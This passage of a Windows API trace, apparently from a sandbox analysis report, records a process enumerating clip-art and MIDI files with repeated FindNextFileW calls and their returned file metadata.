ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa68, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02270_.WMF", cAlternateFileName="")) returned 1 [0175.193] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1041ec4b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1041ec4b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1041ec4b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x30e4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02276_.WMF", cAlternateFileName="")) returned 1 [0175.193] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17a1c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02413_.WMF", cAlternateFileName="")) returned 1 [0175.193] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x670, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02431_.WMF", cAlternateFileName="")) returned 1 [0175.193] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5b4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02437_.WMF", cAlternateFileName="")) returned 1 [0175.193] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x504, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02439_.WMF", cAlternateFileName="")) returned 1 [0175.194] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a54, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02464_.WMF", cAlternateFileName="")) returned 1 [0175.194] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x574, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02465_.WMF", cAlternateFileName="")) returned 1 [0175.194] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1041ec4b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1041ec4b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1041ec4b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x19ca, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02578_.WMF", cAlternateFileName="")) returned 1 [0175.194] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103f89f0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103f89f0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5fec, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02617_.WMF", cAlternateFileName="")) returned 1 [0175.194] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103f89f0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103f89f0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7f4e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02790_.WMF", cAlternateFileName="")) returned 1 [0175.194] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103f89f0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103f89f0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x430c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02791_.WMF", cAlternateFileName="")) returned 1 [0175.194] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103f89f0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103f89f0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5b70, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02793_.WMF", cAlternateFileName="")) returned 1 [0175.194] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4b7a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02794_.WMF", cAlternateFileName="")) returned 1 [0175.194] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103f89f0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103f89f0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1262e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02862_.WMF", cAlternateFileName="")) returned 1 [0175.195] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103f89f0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103f89f0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x967a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02886_.WMF", cAlternateFileName="")) returned 1 [0175.195] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103f89f0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103f89f0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x22f4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO02958_.WMF", cAlternateFileName="")) returned 1 [0175.195] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x107b, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SPACE_01.MID", cAlternateFileName="")) returned 1 [0175.195] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a2c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SPRNG_01.MID", cAlternateFileName="")) returned 1 [0175.195] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1041ec4b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1041ec4b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1041ec4b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbd6, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="STUBBY1.WMF", cAlternateFileName="")) returned 1 [0175.195] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1041ec4b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1041ec4b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1041ec4b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa16, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="STUBBY2.WMF", cAlternateFileName="")) returned 1 [0175.195] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1041ec4b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1041ec4b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1041ec4b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x36dc, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SUMER_01.MID", cAlternateFileName="")) returned 1 [0175.196] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1041ec4b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1041ec4b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1041ec4b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2135, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SWEST_01.MID", cAlternateFileName="")) returned 1 [0175.196] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1041ec4b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1041ec4b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1041ec4b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SY00110_.WMF", cAlternateFileName="")) returned 1 [0175.196] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1041ec4b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1041ec4b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1041ec4b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1844, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SY00127_.WMF", cAlternateFileName="")) returned 1 [0175.196] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1041ec4b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1041ec4b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1041ec4b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x81c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SY00132_.WMF", cAlternateFileName="")) returned 1 [0175.196] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1041ec4b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1041ec4b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1041ec4b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1412, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SY00170_.WMF", cAlternateFileName="")) returned 1 [0175.196] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1041ec4b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1041ec4b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1041ec4b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x50c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SY00560_.WMF", cAlternateFileName="")) returned 1 [0175.196] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x778, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SY00642_.WMF", cAlternateFileName="")) returned 1 [0175.196] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2094, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SY00788_.WMF", cAlternateFileName="")) returned 1 [0175.196] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2fdc, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SY00792_.WMF", cAlternateFileName="")) returned 1 [0175.197] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2764, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SY00795_.WMF", cAlternateFileName="")) returned 1 [0175.197] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x110a3267, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x110a3267, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110ef705, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9b0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SY00882_.WMF", cAlternateFileName="")) returned 1 [0175.197] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x634, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SY01006_.WMF", cAlternateFileName="")) returned 1 [0175.197] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1041ec4b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1041ec4b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1041ec4b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2734, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SY01252_.WMF", cAlternateFileName="")) returned 1 [0175.197] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1113bba3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1113bba3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1113bba3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x78a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SY01253_.WMF", cAlternateFileName="")) returned 1 [0175.197] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x110c9494, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x110c9494, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110ef705, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x326, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SY01462_.WMF", cAlternateFileName="")) returned 1 [0175.197] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x470, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SY01491_.WMF", cAlternateFileName="")) returned 1 [0175.197] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13c4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SY01563_.WMF", cAlternateFileName="")) returned 1 [0175.198] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xce8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SY01572_.WMF", cAlternateFileName="")) returned 1 [0175.198] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x338e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SY01590_.WMF", cAlternateFileName="")) returned 1 [0175.198] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8b6, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TAIL.WMF", cAlternateFileName="")) returned 1 [0175.198] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbde2, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TN00011_.WMF", cAlternateFileName="")) returned 1 [0175.198] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d5e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TN00014_.WMF", cAlternateFileName="")) returned 1 [0175.198] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x243c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TN00018_.WMF", cAlternateFileName="")) returned 1 [0175.198] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x175a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TN00095_.WMF", cAlternateFileName="")) returned 1 [0175.198] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c12, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TN00211_.WMF", cAlternateFileName="")) returned 1 [0175.199] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1224, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TN00217_.WMF", cAlternateFileName="")) returned 1 [0175.199] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, 